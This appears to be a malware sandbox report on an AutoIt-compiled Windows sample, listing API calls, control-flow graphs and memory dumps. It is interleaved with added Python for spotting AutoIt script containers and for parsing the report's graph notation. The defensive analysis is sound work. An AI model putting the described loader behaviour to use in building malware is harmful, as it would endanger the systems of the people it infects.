                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                                                                            • API String ID: 2574300362-3542929980
                                                                                                                            • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                            • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                            • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                            • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                            • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                            • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                            • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                              • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                            • _wcscat.LIBCMT ref: 00429C43
                                                                                                                            • _wcslen.LIBCMT ref: 00429C55
                                                                                                                            • _wcslen.LIBCMT ref: 00429C66
                                                                                                                            • _wcscat.LIBCMT ref: 00429C80
                                                                                                                            • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                            • API String ID: 1004883554-2276155026
                                                                                                                            • Opcode ID: 5537ed625c4de096e6c94be945ac80c2a72a9db179e929550bf68a842ddf9e08
                                                                                                                            • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                            • Opcode Fuzzy Hash: 5537ed625c4de096e6c94be945ac80c2a72a9db179e929550bf68a842ddf9e08
                                                                                                                            • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                            • String ID: FILE
                                                                                                                            • API String ID: 3888824918-3121273764
                                                                                                                            • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                            • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                            • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                            • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                            • RegisterClassExW.USER32 ref: 00410359
                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                            • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                            • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(00981400,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                            • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                            • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                            • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                            • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 004101F9
• LoadCursorW.USER32(00000000,00007F00), ref: 00410209
• LoadIconW.USER32(?,00000063), ref: 0041021F
• LoadIconW.USER32(?,000000A4), ref: 00410232
• LoadIconW.USER32(?,000000A2), ref: 00410245
• LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
• RegisterClassExW.USER32 ref: 004102C6
  • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
  • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
  • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
  • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
  • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
  • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
  • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00981400,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$PGH
• API String ID: 423443420-3673556320
• Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
• Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
• Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
• Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

Control-flow Graph

APIs
• _fseek.LIBCMT ref: 004525DA
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
• __fread_nolock.LIBCMT ref: 00452618
• __fread_nolock.LIBCMT ref: 00452629
• __fread_nolock.LIBCMT ref: 00452644
• __fread_nolock.LIBCMT ref: 00452661
• _fseek.LIBCMT ref: 0045267D
• _malloc.LIBCMT ref: 00452689
• _malloc.LIBCMT ref: 00452696
• __fread_nolock.LIBCMT ref: 004526A7
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: __fread_nolock$_fseek_malloc_wcscpy
• String ID:
• API String ID: 1911931848-0
• Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
• Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
• Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
• Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

Control-flow Graph

                                                                                                                            control_flow_graph 228 40f450-40f45c call 425210 231 40f460-40f478 228->231 231->231 232 40f47a-40f4a8 call 413990 call 410f70 231->232 237 40f4b0-40f4d1 call 4151b0 232->237 240 40f531 237->240 241 40f4d3-40f4da 237->241 244 40f536-40f540 240->244 242 40f4dc-40f4de 241->242 243 40f4fd-40f517 call 41557c 241->243 245 40f4e0-40f4e2 242->245 248 40f51c-40f51f 243->248 247 40f4e6-40f4ed 245->247 249 40f521-40f52c 247->249 250 40f4ef-40f4f2 247->250 248->237 253 40f543-40f54e 249->253 254 40f52e-40f52f 249->254 251 42937a-4293a0 call 41557c call 4151b0 250->251 252 40f4f8-40f4fb 250->252 265 4293a5-4293c3 call 4151d0 251->265 252->243 252->245 256 40f550-40f553 253->256 257 40f555-40f560 253->257 254->250 256->250 259 429372 257->259 260 40f566-40f571 257->260 259->251 261 429361-429367 260->261 262 40f577-40f57a 260->262 261->247 264 42936d 261->264 262->250 264->259 265->244
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: __fread_nolock_fseek_strcat
• String ID: AU3!$EA06
• API String ID: 3818483258-2658333250
• Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
• Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
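The function above is the AutoIt stub's script locator: it seeks and reads through its own image (_fseek, __fread_nolock) and compares against a marker it holds as the two fragments "AU3!" and "EA06", joined with _strcat so the contiguous string never appears in the binary. The scanner below is an added example, not code from the report or from the sample, that performs the same check from the analyst's side: it finds the marker in a file image, reports whether the 16-byte AutoIt container header precedes it (that header is taken from published AutoIt YARA signatures, not from this report), and flags a bare marker separately because a marker without its header is a much weaker signal. The sample buffer is constructed, and the "EA05" variant is included for older AutoIt v3 builds.

```python
import re
import sys

# ASCII marker of an AutoIt v3 compiled-script container. The function above
# holds it as the two fragments "AU3!" and "EA06" and joins them with _strcat;
# "EA05" is the variant used by older AutoIt v3 releases.
AU3_MARKERS = (b"AU3!EA06", b"AU3!EA05")

# 16-byte header that sits directly before the ASCII marker in an AutoIt
# container. Assumption taken from published AutoIt YARA signatures, not from
# this report, which only lists the two string fragments.
AU3_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")


def is_pe(data):
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def find_au3_markers(data):
    """Every (offset, marker, header_present) hit in data, ordered by offset.

    header_present is True when the 16-byte container header immediately
    precedes the marker; a bare marker may just be a string in an unrelated
    tool rather than a script container.
    """
    hits = []
    for marker in AU3_MARKERS:
        for m in re.finditer(re.escape(marker), data):
            off = m.start()
            header = off >= len(AU3_MAGIC) and data[off - len(AU3_MAGIC):off] == AU3_MAGIC
            hits.append((off, marker.decode(), header))
    return sorted(hits)


def classify(data):
    """Triage verdict for one file image."""
    hits = find_au3_markers(data)
    with_header = any(h[2] for h in hits)
    return {
        "pe": is_pe(data),
        "autoit_compiled": with_header,          # marker plus container header
        "marker_only": bool(hits) and not with_header,
        "markers": hits,
    }


# Constructed sample, not a real file: minimal MZ/PE header, padding, one marker
# with its container header, then a bare marker of the older variant.
SAMPLE = (
    b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0"
    + b"\0" * 0x100 + AU3_MAGIC + b"AU3!EA06" + b"\0" * 16 + b"AU3!EA05"
)


def main(path=None):
    data = open(path, "rb").read() if path else SAMPLE
    info = classify(data)
    for off, marker, header in info["markers"]:
        print(f"{off:#x}: {marker} container header: {'yes' if header else 'no'}")
    print(f"PE: {info['pe']}  AutoIt container: {info['autoit_compiled']}")
    return info


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it with a path to scan a real file; without arguments it scans the constructed buffer. A hit with the header present is the case worth extracting; a bare marker is worth a look but is not on its own evidence of an AutoIt container.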

Control-flow Graph

                                                                                                                            control_flow_graph 268 410130-410142 SHGetMalloc 269 410148-410158 SHGetDesktopFolder 268->269 270 42944f-429459 call 411691 268->270 271 4101d1-4101e0 269->271 272 41015a-410188 call 411691 269->272 271->270 278 4101e6-4101ee 271->278 280 4101c5-4101ce 272->280 281 41018a-4101a1 SHGetPathFromIDListW 272->281 280->271 282 4101a3-4101b1 call 411691 281->282 283 4101b4-4101c0 281->283 282->283 283->280
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: _wcscpy$DesktopFolderFromListMallocPath
• String ID: C:\Users\user\Desktop\BL.exe
• API String ID: 192938534-351473123
• Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
• Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
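The control_flow_graph line under each "Control-flow Graph" heading is the report's serialized form of the graph it renders: "<id> <start>-<end>" (or "<id> <addr>" for a one-instruction block) opens a basic block, the API names and "call <target>" pairs that follow belong to that block, and "<a>-><b>" is an edge. The parser below is an added example, not part of the Joe Sandbox report or its tooling; it rebuilds the graph from that text and answers questions the picture alone does not, such as which API calls lie on every path to a return and which blocks are unreachable. The grammar is inferred from the lines on this page, and the embedded sample is the SHGetDesktopFolder function's line copied from the report above; the CreateFileW/VirtualAlloc graph and the others on this page parse the same way.

```python
import re
from collections import deque

NODE_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")   # "start-end" or a single address
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


class Cfg:
    def __init__(self):
        self.blocks = {}   # id -> (start, end, [labels])
        self.succ = {}     # id -> successor ids, in the order the edges were listed
        self.entry = None  # first block listed


def parse_cfg(text):
    """Parse one serialized control_flow_graph line into a Cfg.

    Grammar inferred from this page: "<id> <start>-<end>" or "<id> <addr>" opens
    a block; API names and "call <target>" pairs that follow belong to it;
    "<a>-><b>" is an edge. A call target that is all digits ("call 411691") is
    not mistaken for a block id because "call" consumes the token after it,
    and a real block id is always followed by an address token.
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    cfg, current, i = Cfg(), None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            cfg.succ.setdefault(int(edge.group(1)), []).append(int(edge.group(2)))
            i += 1
        elif NODE_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = int(tok)
            lo, _, hi = tokens[i + 1].partition("-")
            cfg.blocks[current] = (int(lo, 16), int(hi or lo, 16), [])
            cfg.succ.setdefault(current, [])
            if cfg.entry is None:
                cfg.entry = current
            i += 2
        elif current is None:
            raise ValueError(f"label {tok!r} appears before any block")
        elif tok == "call" and i + 1 < len(tokens):
            cfg.blocks[current][2].append(f"call {tokens[i + 1]}")
            i += 2
        else:
            cfg.blocks[current][2].append(tok)
            i += 1
    return cfg


def blocks_with_label(cfg, label):
    return sorted(n for n, (_, _, labels) in cfg.blocks.items() if label in labels)


def api_calls(cfg):
    """API name -> sorted ids of the blocks that call it ("call <addr>" excluded)."""
    out = {}
    for n, (_, _, labels) in cfg.blocks.items():
        for label in labels:
            if not label.startswith("call "):
                out.setdefault(label, []).append(n)
    return {k: sorted(v) for k, v in out.items()}


def exit_blocks(cfg):
    """Blocks with no successor, i.e. where the function returns."""
    return sorted(n for n in cfg.blocks if not cfg.succ.get(n))


def reachable(cfg, start=None, avoid=()):
    """Blocks reachable from start (default: the entry) without entering avoid."""
    seen, todo = set(), deque([cfg.entry if start is None else start])
    while todo:
        n = todo.popleft()
        if n in seen or n in avoid:
            continue
        seen.add(n)
        todo.extend(cfg.succ.get(n, []))
    return seen


def on_every_exit_path(cfg, blocks):
    """True if no exit is reachable from the entry while avoiding all of blocks,
    i.e. every run that returns passes through at least one of them."""
    blocks = set(blocks)
    if cfg.entry in blocks:
        return True
    alive = reachable(cfg, avoid=blocks)
    return not any(e in alive for e in exit_blocks(cfg))


# The SHGetDesktopFolder function's graph, copied from the report line above.
SAMPLE = (
    "control_flow_graph 268 410130-410142 SHGetMalloc 269 410148-410158 "
    "SHGetDesktopFolder 268->269 270 42944f-429459 call 411691 268->270 "
    "271 4101d1-4101e0 269->271 272 41015a-410188 call 411691 269->272 "
    "271->270 278 4101e6-4101ee 271->278 280 4101c5-4101ce 272->280 "
    "281 41018a-4101a1 SHGetPathFromIDListW 272->281 280->271 "
    "282 4101a3-4101b1 call 411691 281->282 283 4101b4-4101c0 281->283 "
    "282->283 283->280"
)


def summarize(text):
    cfg = parse_cfg(text)
    apis = api_calls(cfg)
    return {
        "blocks": len(cfg.blocks),
        "edges": sum(len(v) for v in cfg.succ.values()),
        "entry": f"{cfg.blocks[cfg.entry][0]:#x}",
        "apis": apis,
        "exits": exit_blocks(cfg),
        "unreachable": sorted(set(cfg.blocks) - reachable(cfg)),
        "apis_on_every_return": sorted(a for a, b in apis.items() if on_every_exit_path(cfg, b)),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE), indent=2))
```

For the sample graph this reports ten blocks, thirteen edges, two exits (the early-out block at 0x42944f and the block at 0x4101e6), and SHGetMalloc as the only API on every returning path; SHGetDesktopFolder and SHGetPathFromIDListW each sit behind a failure branch, which is what you would expect of a path lookup that bails out when the shell calls fail.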

Control-flow Graph

                                                                                                                            control_flow_graph 286 3ddc5f8-3ddc6a6 call 3dda008 289 3ddc6ad-3ddc6d3 call 3ddd508 CreateFileW 286->289 292 3ddc6da-3ddc6ea 289->292 293 3ddc6d5 289->293 300 3ddc6ec 292->300 301 3ddc6f1-3ddc70b VirtualAlloc 292->301 294 3ddc825-3ddc829 293->294 295 3ddc86b-3ddc86e 294->295 296 3ddc82b-3ddc82f 294->296 302 3ddc871-3ddc878 295->302 298 3ddc83b-3ddc83f 296->298 299 3ddc831-3ddc834 296->299 303 3ddc84f-3ddc853 298->303 304 3ddc841-3ddc84b 298->304 299->298 300->294 305 3ddc70d 301->305 306 3ddc712-3ddc729 ReadFile 301->306 307 3ddc8cd-3ddc8e2 302->307 308 3ddc87a-3ddc885 302->308 313 3ddc855-3ddc85f 303->313 314 3ddc863 303->314 304->303 305->294 315 3ddc72b 306->315 316 3ddc730-3ddc770 VirtualAlloc 306->316 311 3ddc8e4-3ddc8ef VirtualFree 307->311 312 3ddc8f2-3ddc8fa 307->312 309 3ddc889-3ddc895 308->309 310 3ddc887 308->310 317 3ddc8a9-3ddc8b5 309->317 318 3ddc897-3ddc8a7 309->318 310->307 311->312 313->314 314->295 315->294 319 3ddc777-3ddc792 call 3ddd758 316->319 320 3ddc772 316->320 323 3ddc8b7-3ddc8c0 317->323 324 3ddc8c2-3ddc8c8 317->324 322 3ddc8cb 318->322 326 3ddc79d-3ddc7a7 319->326 320->294 322->302 323->322 324->322 327 3ddc7a9-3ddc7d8 call 3ddd758 326->327 328 3ddc7da-3ddc7ee call 3ddd568 326->328 327->326 334 3ddc7f0 328->334 335 3ddc7f2-3ddc7f6 328->335 334->294 336 3ddc7f8-3ddc7fc CloseHandle 335->336 337 3ddc802-3ddc806 335->337 336->337 338 3ddc808-3ddc813 VirtualFree 337->338 339 3ddc816-3ddc81f 337->339 338->339 339->289 339->294
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03DDC6C9
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03DDC8EF
Memory Dump Source
• Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
• Instruction ID: 587de646613424771fd1b2f67f7563927bed9cd34f8321f3b76137f88c11ccab
• Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
• Instruction Fuzzy Hash: 4FA10574E10209EBDB14CFA4C898FEEBBB5FF48704F248599E501BB280D7759A45CBA4

Control-flow Graph

                                                                                                                            control_flow_graph 340 414f10-414f2c 341 414f4f 340->341 342 414f2e-414f31 340->342 343 414f51-414f55 341->343 342->341 344 414f33-414f35 342->344 345 414f37-414f46 call 417f23 344->345 346 414f56-414f5b 344->346 356 414f47-414f4c call 417ebb 345->356 348 414f6a-414f6d 346->348 349 414f5d-414f68 346->349 352 414f7a-414f7c 348->352 353 414f6f-414f77 call 4131f0 348->353 349->348 351 414f8b-414f9e 349->351 354 414fa0-414fa6 351->354 355 414fa8 351->355 352->345 358 414f7e-414f89 352->358 353->352 359 414faf-414fb1 354->359 355->359 356->341 358->345 358->351 362 4150a1-4150a4 359->362 363 414fb7-414fbe 359->363 362->343 365 414fc0-414fc5 363->365 366 415004-415007 363->366 365->366 367 414fc7 365->367 368 415071-415072 call 41e6b1 366->368 369 415009-41500d 366->369 370 415102 367->370 371 414fcd-414fd1 367->371 380 415077-41507b 368->380 373 41500f-415018 369->373 374 41502e-415035 369->374 375 415106-41510f 370->375 378 414fd3 371->378 379 414fd5-414fd8 371->379 381 415023-415028 373->381 382 41501a-415021 373->382 376 415037 374->376 377 415039-41503c 374->377 375->343 376->377 384 415042-41504e call 41453a call 41ed9e 377->384 385 4150d5-4150d9 377->385 378->379 386 4150a9-4150af 379->386 387 414fde-414fff call 41ee9b 379->387 380->375 388 415081-415085 380->388 383 41502a-41502c 381->383 382->383 383->377 408 415053-415058 384->408 394 4150eb-4150fd call 417f23 385->394 395 4150db-4150e8 call 4131f0 385->395 390 4150b1-4150bd call 4131f0 386->390 391 4150c0-4150d0 call 417f23 386->391 396 415099-41509b 387->396 388->385 389 415087-415096 388->389 389->396 390->391 391->356 394->356 395->394 396->362 396->363 409 415114-415118 408->409 410 41505e-415061 408->410 409->375 410->370 411 415067-41506f 410->411 411->396
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
